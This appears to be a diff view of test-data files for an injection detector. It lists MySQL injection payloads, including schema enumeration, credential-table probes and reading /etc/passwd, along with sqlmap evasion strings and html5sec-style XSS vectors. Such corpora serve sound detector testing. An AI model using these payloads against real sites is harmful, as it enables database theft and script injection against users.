1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
1%') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('%'='
1%') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('%'='
1%')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('%'='
1%')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('%'='
1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('%'='
1%'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('%'='
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eLVs'='eLVs
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND 'eVVr' LIKE 'eVVr
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- OiYW
1' IN BOOLEAN MODE) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (2270=3285) THEN 1 ELSE 0x28 END))#
1' IN BOOLEAN MODE) RLIKE (SELECT (CASE WHEN (7449=7449) THEN 1 ELSE 0x28 END))#
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'BiBK' LIKE 'BiBK
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND 'PqYc'='PqYc
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- WaOc
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('bgJB'='bgJB
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('nPXQ' LIKE 'nPXQ
1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ahKA
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('MTGN'='MTGN
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ('UTnW' LIKE 'UTnW
1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- jjec
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('apRZ'='apRZ
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ('uTOg' LIKE 'uTOg
1') PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- zMbs
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('BQCu' LIKE 'BQCu
1')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (('dmjR'='dmjR
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('OhUO' LIKE 'OhUO
1')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (('sonC'='sonC
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('LfMY'='LfMY
1')) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (('MWjv' LIKE 'MWjv
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('FTHS'='FTHS
1'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((('igdM' LIKE 'igdM
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('WZKG' LIKE 'WZKG
1'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((('yWmg'='yWmg
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('FUsX' LIKE 'FUsX
1'))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((('mBLH'='mBLH
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (3370=3370
1) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- rXfN
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (9212=9212
1) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- KZqT
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (9114=9114
1) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1)-- eHGn
1)) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((2068=2068
1)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((7248=7248
1)) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((3064=3064
1))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (((5697=5697
1))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (((1805=1805
1))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (((5031=5031
EXP(~(SELECT * FROM (SELECT CONCAT(0x71786a7671,(SELECT (ELT(7823=7823,1))),0x7162716b71,0x78))x))

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,22 @@
#
# Attacks pulled out of the examples from SQLMAP
#
# https:#svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2mssqlhash.py
1%23%0AAND%23%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2morehash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2hash.py
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/space2dash.py
1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/modsecurityzeroversioned.py
1+/*!00000AND+2>1*/--'
# https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/halfversionedmorekeywords.py
value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa

View file

@ -0,0 +1,56 @@
1' and '1' like '1
1' and '1' like '0
1' and 0 < (select length(@@version)) and '1' like '1
1' own3d by 1
1' order by 1#
1' order by 15000#
1' order by 2 #
1' order by 4 #
1' order by 3 #
1' and 1=0 union all select 0x373134,0x373135#
1' and 1 = 0 UNION ALL SELECT 0,CONCAT(@@version,0x5468655f4d6f6c652e46316e67657221)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.schemata where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 6 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(schema_name, 0x20)),0x3a3a2d3a3a) from information_schema.schemata where 1=1 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x6a756e6b limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 1 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(column_name, 0x20)),0x3a3a2d3a3a) from information_schema.columns where table_schema = 0x6a756e6b and table_name = 0x6a756e6b7573657273 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(user(), 0x20),IFNULL(version(), 0x20),IFNULL(database(), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f6574632f70617373776f7264), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(load_file(0x2f746d702f6a756e6b), 0x20)),0x3a3a2d3a3a)#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.adm where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admin_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.admins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrator where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administrador where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.administradores where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.client where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.clients where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.jos_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.login where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.logins where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.user_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuario where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usuarios_admin where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usr where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.usrs where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from mysql.wp_users where 1=1#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d6173 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,COUNT(*),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525#
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 4 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 5 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 2 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 0 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 3 #
1' and 1=0 UNION ALL SELECT 0,CONCAT(0x3a3a2d3a3a,CONCAT_WS(0x3e3c,IFNULL(table_name, 0x20)),0x3a3a2d3a3a) from information_schema.tables where table_schema = 0x696e666f726d6174696f6e5f736368656d61 and table_name like 0x2541424c4525 limit 1 offset 1 #

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,3 @@
# https://github.com/client9/libinjection/issues/68
%3Cobject%00IRSDL+allowScriptAccess%3Dalways+data%3D%2F%2F0me.me%2Fdemo%2Fxss%2Fflash%2FnormalEmbededXSS.swf%3F

View file

@ -0,0 +1,3 @@
# https://twitter.com/0x6D6172696F/status/394932823645503488
# http://pastebin.com/jNPbhduR
<p style="font-family:',;a\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d\\61lert\\28\\31\\29\\3e:1'">

View file

@ -0,0 +1,4 @@
#
# https://github.com/angular/angular.js/pull/11290
#
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />

View file

@ -0,0 +1,488 @@
#
# http://html5sec.org
# retreieved 2013-11-06
test 1 <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
# obsolete firefox 3
#test 2 <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
# obsolete firefox 3
#test 3 <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
test 4 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 5 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
test 6 <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
test 7 <input onfocus=write(1) autofocus>
test 8 <input onblur=write(1) autofocus><input autofocus>
test 9 <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
test 10 <video poster=javascript:alert(1)//></video>
test 11 <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
test 12 <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
# opera only, only "DoS"
# test 13 <x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
# opera only, "DoS"
# test 14 <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
test 15 <script>({0:#0=alert/#0#/#0#(0)})</script>
test 16 X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
test 17 <?xml-stylesheet href="javascript:alert(1)"?><root/>
test 18 <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
# obsolete firefox 3
# test 19 <meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
test 20 <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
test 21 <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
test 22 <input onblur=focus() autofocus><input>
test 23 <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
test 24 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
test 25 <script src="#">{alert(1)}</script>;1
# obsolete firefox 4 and under
# test 26 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
test 27 <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
test 28 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
test 29 <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
test 30 <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
test 31_1 <frameset onload=alert(1)>
test 31_2 <body onload=alert(1)>
test 32 <table background="javascript:alert(1)"></table>
test 33 <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
test 34 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%25;height:100%25 src=test.vml#xss></vmlframe>
